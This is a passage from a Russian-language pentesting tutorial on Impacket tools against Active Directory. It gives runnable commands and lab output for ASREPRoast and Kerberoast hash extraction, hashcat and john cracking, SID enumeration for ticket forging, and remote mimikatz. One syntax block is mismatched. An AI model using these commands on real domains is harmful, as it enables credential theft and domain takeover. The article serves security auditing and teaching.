If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -dc-ip ip address     IP Address of the domain controller. 
If ommited it use the domain part (FQDN) specified in the target parameter<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d getArch<\/font><\/h3>\n<p>  \u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0443 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441\u0435\u0440\u0432\u0435\u0440\u0430. \u041d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u0432\u044b\u0431\u043e\u0440 \u043d\u0435\u0432\u0435\u043b\u0438\u043a, \u043f\u0440\u0438\u0432\u0435\u0434\u0451\u043d \u0437\u0434\u0435\u0441\u044c \u0441 \u0430\u043a\u0430\u0434\u0435\u043c\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0446\u0435\u043b\u044c\u044e:<\/p>\n<pre><code class=\"bash\">getArch.py -target 192.168.1.13  [*] Gathering OS architecture for 1 machines [*] Socket connect timeout set to 2 secs 192.168.1.13 is 64-bit <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: getArch.py [-h] [-target TARGET] [-targets TARGETS] [-timeout TIMEOUT] [-debug]  optional arguments:   -h, --help        show this help message and exit   -target TARGET    &lt;targetName or address>   -targets TARGETS  input file with targets system to query Arch from (one per line).   
-timeout TIMEOUT  socket timeout out when connecting to the target (default 2 sec)   -debug            Turn DEBUG output ON<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d GetNPUsers<\/font><\/h3>\n<p>  \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0434\u043e\u043c\u0435\u043d \u0434\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u043c <i>\u041d\u0435 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u0442\u044c \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Kerberos<\/i>, \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u0442 \u043e\u0442\u0432\u0435\u0442\u044b <i>AS_REP<\/i> \u0431\u0435\u0437 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 \u044d\u043a\u0441\u043f\u043e\u0440\u0442\u0438\u0440\u0443\u0435\u0442 \u0438\u0445 <a href=\"https:\/\/en.wikipedia.org\/wiki\/Ticket_Granting_Ticket\">TGT<\/a> \u0434\u043b\u044f \u043e\u0442\u043b\u043e\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u0434\u0431\u043e\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u044f, \u0442\u0430\u043a \u043a\u0430\u043a \u043e\u043d\u0438 \u0431\u0443\u0434\u0443\u0442 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u044b \u043f\u0430\u0440\u043e\u043b\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. 
\u0414\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043f\u043e\u043d\u044f\u043b: \u0437\u0434\u0435\u0441\u044c \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043e \u043f\u0440\u043e \u043c\u0435\u0442\u043e\u0434\u0438\u043a\u0443 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 Active Directory <b><font color=\"#3AC1EF\">ASREPROAST<\/font><\/b>, \u043a\u043e\u0433\u0434\u0430 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 \u0437\u0430\u0434\u0430\u043b \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u044b\u0435, \u0441 \u0435\u0433\u043e \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f, \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 Kerberos \u0434\u043b\u044f \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438, \u0430 \u0430\u0443\u0434\u0438\u0442\u043e\u0440 \u0438\u0445 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b, \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u043d\u0443\u0436\u043d\u0443\u044e \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438 \u043f\u043e\u043f\u044b\u0442\u0430\u043b\u0441\u044f \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c. 
\u0412\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043b\u044e\u0431\u043e\u0439 \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0439 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438:<\/p>\n<pre><code class=\"bash\">.\/GetNPUsers.py ad.ruvds.ru\/Ruvds -request  Name  MemberOf  PasswordLastSet             LastLogon                   UAC ----  --------  --------------------------  --------------------------  -------- test            2023-01-12 20:56:06.969165  2023-04-03 16:59:57.351166  0x410200 $krb5asrep$23$test@AD.RUVDS.RU:96112...73af5559c804a9458a88221c959a98453 <\/code><\/pre>\n<p>  \u0414\u0430\u043b\u0435\u0435 \u0445\u0435\u0448 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c \u043d\u0430 \u043f\u0435\u0440\u0435\u0431\u043e\u0440:<\/p>\n<pre><code class=\"bash\">john --wordlist=\u0441\u043b\u043e\u0432\u0430\u0440\u044c.txt \u0444\u0430\u0439\u043b_\u0441_\u0445\u0435\u0448\u0430\u043c\u0438.hashes <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE]                      [-format {hashcat,john}] [-usersfile USERSFILE] [-ts]                      [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k]                      [-aesKey hex key] [-dc-ip ip address]                      target  positional arguments:   target                domain\/username[:password]  optional arguments:   -h, --help            show this help message and exit   -request              Requests TGT for users and output them in JtR\/hashcat                         format (default False)   -outputfile OUTPUTFILE                         Output filename to write ciphers in JtR\/hashcat format   -format {hashcat,john}      
                   format to save the AS_REQ of users without pre-                         authentication. Default is hashcat   -usersfile USERSFILE  File with user per line to test   -ts                   Adds timestamp to every logging output   -debug                Turn DEBUG output ON  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from                         ccache file (KRB5CCNAME) based on target parameters.                         If valid credentials cannot be found, it will use the                         ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256                         bits)   -dc-ip ip address     IP Address of the domain controller. If ommited it use                         the domain part (FQDN) specified in the target                         parameter  There are a few modes for using this script  1. Get a TGT for a user:          GetNPUsers.py contoso.com\/john.doe -no-pass  For this operation you don't need john.doe's password. It is important tho, to specify -no-pass in the script, otherwise a badpwdcount entry will be added to the user  2. Get a list of users with UF_DONT_REQUIRE_PREAUTH set          GetNPUsers.py contoso.com\/emily:password or GetNPUsers.py contoso.com\/emily  This will list all the users in the contoso.com domain that have UF_DONT_REQUIRE_PREAUTH set. However it will require you to have emily's password. (If you don't specify it, it will be asked by the script)  3. Request TGTs for all users          GetNPUsers.py contoso.com\/emily:password -request or GetNPUsers.py contoso.com\/emily  4. 
Request TGTs for users in a file          GetNPUsers.py contoso.com\/ -no-pass -usersfile users.txt  For this operation you don't need credentials.<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d getTGT.py<\/font><\/h3>\n<p>  \u0412\u044b\u043f\u0438\u0441\u0430\u0442\u044c \u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c TGT \u0434\u043b\u044f \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438. \u0418\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 Kerberos, \u0434\u0430 \u0438 \u0432\u043e\u043e\u0431\u0449\u0435 \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u0431\u0438\u043b\u0435\u0442\u0430\u043c\u0438 \u0438\u0437-\u043f\u043e\u0434 Linux:  <\/p>\n<pre><code class=\"bash\">getTGT.py ad.ruvds.ru\/admin:password -dc-ip 192.168.1.13 KRB5CCNAME=admin.ccache <\/code><\/pre>\n<p>  \u0412\u0442\u043e\u0440\u0430\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442 \u0432\u044b\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 \u0432 \u0441\u0435\u0430\u043d\u0441 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u043a\u043e\u043d\u0441\u043e\u043b\u0438. \u0414\u0435\u043b\u0430\u0435\u0442\u0441\u044f \u044d\u0442\u043e \u0434\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0441 Active Directory \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c Kerberos. 
\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043d\u0435 \u0432\u0432\u043e\u0434\u0438\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u0438 \u0434\u043b\u044f \u043a\u043e\u043c\u0430\u043d\u0434 Impacket, \u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 <i>-no-pass<\/i>. <s>\u0412 \u043a\u0430\u0436\u0434\u043e\u0439 \u0448\u0443\u0442\u043a\u0435 \u0435\u0441\u0442\u044c \u0434\u043e\u043b\u044f \u0448\u0443\u0442\u043a\u0438)<\/s>.<\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: getPac.py [-h] -targetUser TARGETUSER [-debug] [-hashes LMHASH:NTHASH] credentials  positional arguments:   credentials           domain\/username[:password]. Valid domain credentials to use for grabbing targetUser's PAC  optional arguments:   -h, --help            show this help message and exit   -targetUser TARGETUSER                         the target user to retrieve the PAC of   -debug                Turn DEBUG output ON  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d GetUserSPNs<\/font><\/h3>\n<p>  \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0434\u043e\u043c\u0435\u043d \u0434\u043b\u044f \u0438\u043c\u0451\u043d <a href=\"https:\/\/sysadminwiki.ru\/wiki\/Service_Principal_Name_(SPN)\">SPN<\/a>, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0445 \u043f\u043e\u0434 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u044c\u044e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. 
\u041d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u0430\u0442\u0430\u043a\u0430 <b><font color=\"#3AC1EF\">KERBEROAST<\/font><\/b> \u0432\u043e \u0432\u0441\u0435\u0439 \u043a\u0440\u0430\u0441\u0435. \u0417\u043d\u0430\u044f \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043b\u044e\u0431\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u0430 \u0438 SPN \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u0438\u0437 \u0434\u043e\u043c\u0435\u043d\u0430, \u0430\u0443\u0434\u0438\u0442\u043e\u0440 \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u0442\u044c <a href=\"https:\/\/www.sciencedirect.com\/topics\/computer-science\/ticket-granting-service\">TGS<\/a> \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f (\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u0435\u043c\u0443, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043f\u043e\u0441\u043b\u0435 <a href=\"https:\/\/www.securitylab.ru\/glossary\/password_spraying\/\">password spraying<\/a>) \u0434\u043b\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 SPN. 
\u0410 \u0432\u0437\u043b\u043e\u043c\u0430\u0432 TGS, \u0443\u0437\u043d\u0430\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u0438 \u043e\u0442 \u044d\u0442\u0438\u0445 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 (\u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 SPN, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0438\u043c\u0435\u0442\u044c \u0448\u0438\u0440\u043e\u043a\u0438\u0435 \u043f\u0440\u0430\u0432\u0430 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438 \u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 <s>\u0435\u0441\u043b\u0438 \u043d\u0435 \u0432\u0435\u0447\u043d\u044b\u0439<\/s> \u043f\u0435\u0440\u0441\u0438\u0441\u0442\u0430\u043d\u0441 \u043f\u0430\u0440\u043e\u043b\u0435\u0439). \u041f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0435 \u0445\u0435\u0448\u0438 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u043d\u0430 \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432 hashcat:  <\/p>\n<pre><code class=\"bash\">.\/GetUserSPNs.py -request -dc-ip 192.168.1.13 ad.ruvds.ru\/Ruvds  ServicePrincipalName  Name     MemberOf  PasswordLastSet             LastLogon                   Delegation --------------------  -------  --------  --------------------------  --------------------------  ----------- HTTP\/ad.ruvds.ru   iis_svc            2023-02-13 15:21:08.345126  2023-03-29 16:39:22.877495 cifs\/ad.ruvds.ru   Backup             2023-03-20 15:47:56.875247  2023-03-20 16:27:18.994585  constrained [-] CCache file is not found. Skipping... 
$krb5tgs$23$*iis_svc$AD.RUVDS.RU$ad.ruvds.ru\/iis_svc*$6a18d8ad3e4147f72d40a...cfb06f42232ccaac066b18bc4e6d3e3415aa8ce7dbbbcfb80375e $krb5tgs$23$*Backup$AD.RUVDS.RU$ad.ruvds.ru\/Backup*$b5cedc9f87eed91be8028cf...b271176a28ee3d18f83755739bbbb7ea8cf26a642a723ca3d53e  hashcat -a 0 -m 13100 \u0444\u0430\u0439\u043b_\u0441_\u0445\u0435\u0448\u0430\u043c\u0438 \u0441\u043b\u043e\u0432\u0430\u0440\u044c.txt <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: GetUserSPNs.py [-h] [-target-domain TARGET_DOMAIN] [-usersfile USERSFILE] [-request] [-request-user username] [-save] [-outputfile OUTPUTFILE] [-debug]                       [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address]                       target  positional arguments:   target                domain\/username[:password]  optional arguments:   -h, --help            show this help message and exit   -target-domain TARGET_DOMAIN                         Domain to query\/request if different than the domain of the user. Allows for Kerberoasting across trusts.   -usersfile USERSFILE  File with user per line to test   -request              Requests TGS for users and output them in JtR\/hashcat format (default False)   -request-user username                         Requests TGS for the SPN associated to the user specified (just the username, no domain needed)   -save                 Saves TGS requested to disk. Format is &lt;username>.ccache. 
Auto selects -request   -outputfile OUTPUTFILE                         Output filename to write ciphers in JtR\/hashcat format   -debug                Turn DEBUG output ON  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter. Ignoredif -target-domain is specified.<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d lookupsid<\/font><\/h3>\n<p>  \u0423\u0437\u043d\u0430\u0442\u044c \u0430\u0442\u0440\u0438\u0431\u0443\u0442 <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/identity\/ad-ds\/manage\/understand-security-identifiers\">SID<\/a> \u0434\u043e\u043c\u0435\u043d\u0430. 
\u0417\u0430\u0434\u0430\u0447\u0430 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0430\u044f, \u043e\u043d \u043d\u0443\u0436\u0435\u043d \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a <b><font color=\"#3AC1EF\"><a href=\"https:\/\/www.securitylab.ru\/analytics\/536144.php\">Silver Ticket<\/a><\/font><\/b> \u0438 <b><font color=\"#3AC1EF\"><a href=\"https:\/\/habr.com\/ru\/companies\/rvision\/articles\/686784\/\">Golden Ticket<\/a><\/font><\/b>:<\/p>\n<pre><code class=\"bash\">python3 \/usr\/share\/doc\/python3-impacket\/examples\/lookupsid.py ad.ruvds.ru\/admin:password@192.168.1.13  [*] Brute forcing SIDs at 192.168.1.13 [*] StringBinding ncacn_np:192.168.1.13[\\pipe\\lsarpc] [*] Domain SID is: S-1-5-21-1377681614-1103095939-2089592296 498: AD\\\u041a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f - \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u0435\u043d\u0438\u0435 (SidTypeGroup) 500: AD\\\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (SidTypeUser) 501: AD\\\u0413\u043e\u0441\u0442\u044c (SidTypeUser) 502: AD\\krbtgt (SidTypeUser) 512: AD\\\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430 (SidTypeGroup) 513: AD\\\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0434\u043e\u043c\u0435\u043d\u0430 (SidTypeGroup) 514: AD\\\u0413\u043e\u0441\u0442\u0438 \u0434\u043e\u043c\u0435\u043d\u0430 (SidTypeGroup) 515: AD\\\u041a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430 (SidTypeGroup) 516: AD\\\u041a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430 (SidTypeGroup) 517: AD\\\u0418\u0437\u0434\u0430\u0442\u0435\u043b\u0438 
\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0432 (SidTypeAlias) 518: AD\\\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u044b \u0441\u0445\u0435\u043c\u044b (SidTypeGroup) 519: AD\\\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u044b \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f (SidTypeGroup) 520: AD\\\u0412\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u044b-\u0441\u043e\u0437\u0434\u0430\u0442\u0435\u043b\u0438 \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u043e\u0439 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0438 (SidTypeGroup) 521: AD\\\u041a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430 - \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u0435\u043d\u0438\u0435 (SidTypeGroup) 522: AD\\\u041a\u043b\u043e\u043d\u0438\u0440\u0443\u0435\u043c\u044b\u0435 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430 (SidTypeGroup) 525: AD\\Protected Users (SidTypeGroup) 526: AD\\\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u044b \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f (SidTypeGroup) 527: AD\\\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u044b \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f (SidTypeGroup) 553: AD\\\u0421\u0435\u0440\u0432\u0435\u0440\u044b RAS \u0438 IAS (SidTypeAlias) 571: AD\\\u0413\u0440\u0443\u043f\u043f\u0430 \u0441 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435\u043c \u0440\u0435\u043f\u043b\u0438\u043a\u0430\u0446\u0438\u0438 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 RODC (SidTypeAlias) 572: AD\\\u0413\u0440\u0443\u043f\u043f\u0430 \u0441 \u0437\u0430\u043f\u0440\u0435\u0449\u0435\u043d\u0438\u0435\u043c 
\u0440\u0435\u043f\u043b\u0438\u043a\u0430\u0446\u0438\u0438 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 RODC (SidTypeAlias) 1002: AD\\Windows Admin Center CredSSP Administrators (SidTypeAlias) 1003: AD\\WIN-LIELOSOD7LK$ (SidTypeUser) 1104: AD\\DnsAdmins (SidTypeAlias) 1105: AD\\DnsUpdateProxy (SidTypeGroup) 1106: AD\\RUVDSMASTER$ (SidTypeUser) 1107: AD\\Ruvds (SidTypeUser) 1108: AD\\RUVDS-PC$ (SidTypeUser) 1111: AD\\RBCDmachine$ (SidTypeUser) 1112: AD\\test (SidTypeUser) 1114: AD\\admin (SidTypeUser) <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: lookupsid.py [-h] [-ts] [-target-ip ip address] [-port [destination port]] [-domain-sids] [-hashes LMHASH:NTHASH] [-no-pass] target [maxRid]   positional arguments:   target                [[domain\/]username[:password]@]&lt;targetName or address>   maxRid                max Rid to check (default 4000)  optional arguments:   -h, --help            show this help message and exit   -ts                   Adds timestamp to every logging output  connection:   -target-ip ip address                         IP Address of the target machine. If omitted it will use whatever was specified as target. 
This is useful when target is the NetBIOS name and you cannot                         resolve it   -port [destination port]                         Destination port to connect to SMB Server   -domain-sids          Enumerate Domain SIDs (will likely forward requests to the DC)  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful when proxying through smbrelayx)<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d mimikatz<\/font><\/h3>\n<p>  \u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0438 \u043e\u043f\u0438\u0441\u0430\u043d \u0431\u044b\u043b \u0443\u0436\u0435 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435. \u0423\u0441\u043f\u0435\u0448\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u043f\u0440\u0438\u0432\u0435\u0434\u0451\u0442 \u043a \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044e Mimikatz \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435. \u041d\u0430 \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Windows Server \u0435\u0433\u043e \u0442\u0443\u0442 \u0436\u0435 \u043f\u0440\u0438\u0431\u044c\u0451\u0442 <i>Defender<\/i>:<\/p>\n<pre><code class=\"bash\">python3 mimikatz.py ad.ruvds.ru\/admin:password@192.168.1.13    .#####.   mimikatz 2.2.0 (x64) #19041 Apr 10 2023 17:19:53  .## ^ ##.  
\"A La Vie, A L'Amour\" - (oe.eo)  ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )  ## \\ \/ ##       > https:\/\/blog.gentilkiwi.com\/mimikatz  '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )   '#####'        > https:\/\/pingcastle.com \/ https:\/\/mysmartlogon.com ***\/  mimikatz(commandline) # <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: mimikatz.py [-h] [-file FILE] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-target-ip ip address] target   positional arguments:   target                [[domain\/]username[:password]@]&lt;targetName or address>  optional arguments:   -h, --help            show this help message and exit   -file FILE            input file with commands to execute in the mini shell   -debug                Turn DEBUG output ON  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. 